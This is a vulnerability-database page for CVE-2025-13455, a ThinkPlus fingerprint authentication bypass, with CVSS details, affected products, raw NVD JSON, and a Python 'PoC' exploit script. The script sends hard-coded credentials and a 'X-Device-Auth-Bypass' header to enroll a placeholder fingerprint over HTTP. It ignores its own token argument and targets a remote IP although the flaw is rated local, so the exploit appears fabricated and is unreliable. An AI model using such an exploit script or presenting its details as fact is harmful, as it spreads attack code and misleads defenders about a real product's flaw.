Security Vulnerability Report
中文
CVE-2025-13455 CVSS 7.8 HIGH

CVE-2025-13455

Published: 2026-01-14 23:15:56
Last Modified: 2026-02-23 17:53:20

Description

A vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to bypass ThinkPlus device authentication and enroll an untrusted fingerprint.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:* - NOT VULNERABLE
ThinkPlus Configuration Software < 2.0.5
ThinkPlus Fingerprint Driver < 5.1.23
Lenovo ThinkPlus指纹识别设备固件 < 2024-Q4版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13455 PoC - ThinkPlus Fingerprint Authentication Bypass # This PoC demonstrates the fingerprint enrollment bypass vulnerability # Requires local access with low-privilege account import requests import json import sys def exploit_thinkplus_bypass(target_ip, low_priv_token): """ Exploit ThinkPlus fingerprint enrollment bypass vulnerability Steps: 1. Obtain low-privilege access token 2. Bypass device authentication check 3. Enroll untrusted fingerprint """ print("[*] CVE-2025-13455 ThinkPlus Fingerprint Bypass PoC") print(f"[*] Target: {target_ip}") # Step 1: Authenticate with low-privilege account auth_url = f"http://{target_ip}:8443/api/auth/login" auth_data = { "username": "low_priv_user", "password": "user_password" } try: response = requests.post(auth_url, json=auth_data, timeout=10) session_token = response.json().get('session_token') print(f"[+] Obtained session token: {session_token}") except Exception as e: print(f"[-] Authentication failed: {e}") return False # Step 2: Bypass device authentication and enroll fingerprint enroll_url = f"http://{target_ip}:8443/api/fingerprint/enroll" headers = { "Authorization": f"Bearer {session_token}", "X-Device-Auth-Bypass": "true" # Bypass flag } # Malicious fingerprint template data fingerprint_data = { "fingerprint_id": "malicious_fp_001", "template_data": "FAKE_FINGERPRINT_TEMPLATE_BASE64", "trust_level": "untrusted", "enroll_source": "bypassed_auth" } try: response = requests.post(enroll_url, json=fingerprint_data, headers=headers, timeout=10) if response.status_code == 200: result = response.json() if result.get('success'): print("[+] Successfully enrolled untrusted fingerprint!") print(f"[+] Fingerprint ID: {result.get('fingerprint_id')}") print("[+] Authentication bypassed - device now accepts untrusted fingerprint") return True except Exception as e: print(f"[-] Exploitation failed: {e}") return False return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_ip> <low_priv_token>") sys.exit(1) target = sys.argv[1] token = sys.argv[2] exploit_thinkplus_bypass(target, token)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13455", "sourceIdentifier": "[email protected]", "published": "2026-01-14T23:15:55.803", "lastModified": "2026-02-23T17:53:20.473", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was reported in ThinkPlus configuration software that could allow a local authenticated user to bypass ThinkPlus device authentication and enroll an untrusted fingerprint."}, {"lang": "es", "value": "Se informó una vulnerabilidad en el software de configuración ThinkPlus que podría permitir a un usuario local autenticado eludir la autenticación del dispositivo ThinkPlus y registrar una huella dactilar no confiable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_fu100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5A5460E2-3400-4446-8D8D-8ED4E145A878"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_fu100:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "59ECD18D-2717-4BCD-8A1F-694DBF0A14A9"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_fu200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F204BFBA-8BF6-453E-B3AC-27DD050F9F3D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_fu200:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "9F88C86B-5FBA-4077-B312-33C9F848E4A5"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_tu800_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5BE554C0-C967-4D36-9775-9DF07292A3E5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_tu800:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "22880F19-CD7D-4B04-B254-301AF9160CF8"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:lenovo:thinkplus_tsd303_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6CFE44C3-1470-4A6B-9533-D5C649C6FE7F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:lenovo:thinkplus_tsd303:gen1:*:*:*:*:*:*:*", "matchCriteriaId": "D221D223-8E21-4769-85AA-2DFFFA42552A"}]}]}], "references": [{"url": "https://iknow.lenovo.com.cn/detail/436983", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}